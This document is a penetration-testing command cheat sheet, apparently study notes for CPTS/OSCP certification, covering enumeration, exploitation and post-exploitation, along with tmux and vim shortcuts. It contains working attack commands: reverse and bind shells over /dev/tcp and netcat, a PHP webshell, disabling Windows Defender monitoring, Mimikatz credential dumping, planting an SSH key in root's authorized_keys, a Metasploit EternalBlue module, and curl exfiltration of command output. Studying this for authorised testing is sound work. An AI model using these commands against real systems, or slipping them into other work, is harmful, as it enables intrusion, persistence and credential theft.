Useful commands

Windows & AD

# Bypass the execution policy in PS
powershell -ep bypass

# Powershell command using to disable real time monitoring in Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true

# Disable Powershell ExecutionPolicy
Set-ExecutionPolicy Unrestricted
Get-ExecutionPolicy

# Verifying if Credential Guard is enabled : DeviceGuardSecurityServicesConfigured, DeviceGuardSecurityServicesRunning
Get-ComputerInfo

# Decrypt GPP AES-256 encrypted password
gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"

# Domain account policy
net accounts

Service Scanning

# Run an nmap script scan on an IP
nmap -sV -sC -p- 10.129.42.253

# List various available nmap scripts
locate scripts/citrix

# Run an nmap script on an IP
nmap --script smb-os-discovery.nse -p445 10.10.10.40

# Grab banner of an open port
netcat 10.10.10.10 22

# List SMB Shares
smbclient -N -L \\\\10.129.42.253

# Connect to an SMB share
smbclient \\\\10.129.42.253\\users

# Scan SNMP on an IP
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0

# Brute force SNMP secret string
onesixtyone -c dict.txt 10.129.42.254

Web Enumeration

# Run a directory scan on a website
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt

# Run a sub-domain scan on a website
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt

# Grab website banner
curl -IL https://www.inlanefreight.com

# List details about the webserver/certificates
whatweb 10.10.10.121

# List potential directories in robots.txt
curl 10.10.10.121/robots.txt

Public Exploits

# Search for public exploits for a web application
searchsploit openssh 7.2

# MSF: Search for public exploits in MSF
search exploit eternalblue

# MSF: Start using an MSF module
use exploit/windows/smb/ms17_010_psexec

# MSF: Show required options for an MSF module
show options

# MSF: Set a value for an MSF module option
set RHOSTS 10.10.10.40

# MSF: Test if the target server is vulnerable
check

# MSF: Run the exploit on the target server is vulnerable
exploit

Using Shells

# Start a nc listener on a local port
nc -lvnp 1234

# Send a reverse shell from the remote server
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'

# Another command to send a reverse shell from the remote server
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

# Start a bind shell on the remote server
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

# Connect to a bind shell started on the remote server
nc 10.10.10.1 1234

# Create a webshell php file
echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php

# Execute a command on an uploaded webshell
curl http://SERVER_IP:PORT/shell.php?cmd=id

Privilege Escalation

# List available sudo privileges
sudo -l

# Run a command with sudo
sudo -u user /bin/echo Hello World! 

# Switch to root user (if we have access to sudo su)
sudo su -

# Switch to a user (if we have access to sudo su)
sudo su user - 

# Create a new SSH key
ssh-keygen -f key 

# Add the generated public key to the user
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys

# SSH to the server with the generated private key
ssh root@10.10.10.10 -i key

Transferring Files

# Convert a file to base64
base64 shell -w 0

# Convert a file from base64 back to its origin
echo f0VMR...SNIO...InmDwU | base64 -d > shell

# Check the file's md5sum to ensure it converted correctly
md5sum shell

Tcpdump

# Filter output with the source, destination and port
sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap

sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
sudo tcpdump -n port 81 -r password_cracking_filtered.pcap

Mimikatz

# Enable SeDebugPrivilege access right
privilege::debug
# Elevate to SYSTEM user privileges
token::elevate
# Extract Passwords/Hashes from the system
sekurlsa::logonpasswords
lsadump::sam

OOB

# start upload server
python3 -m uploadserver 8080
# Send output of a command to attacker
command &> /tmp/output; curl --data @/tmp/output http://127.0.0.1:8080/upload
# monitor trafic on localhost port 8080
sudo tcpdump -nvvvXi lo tcp port 8080

Basic Tools

Command

Description

General

sudo openvpn user.ovpn

Connect to VPN

ifconfig/ip a

Show our IP address

netstat -rn

Show networks accessible via the VPN

ssh user@10.10.10.10

SSH to a remote server

ftp 10.129.42.253

FTP to a remote server

tmux

tmux

Start tmux

ctrl+b

tmux: default prefix

prefix c

tmux: new window

prefix 1

tmux: switch to window (1)

prefix shift+%

tmux: split pane vertically

prefix shift+"

tmux: split pane horizontally

prefix ->

tmux: switch to the right pane

Vim

vim file

vim: open file with vim

esc+i

vim: enter insert mode

esc

vim: back to normal mode

x

vim: Cut character

dw

vim: Cut word

dd

vim: Cut full line

yw

vim: Copy word

yy

vim: Copy full line

p

vim: Paste

:1

vim: Go to line number 1.

:w

vim: Write the file 'i.e. save'

:q

vim: Quit

:q!

vim: Quit without saving

:wq

vim: Write and quit

PreviousCPTS / OSCPNextInformation Gathering

Last updated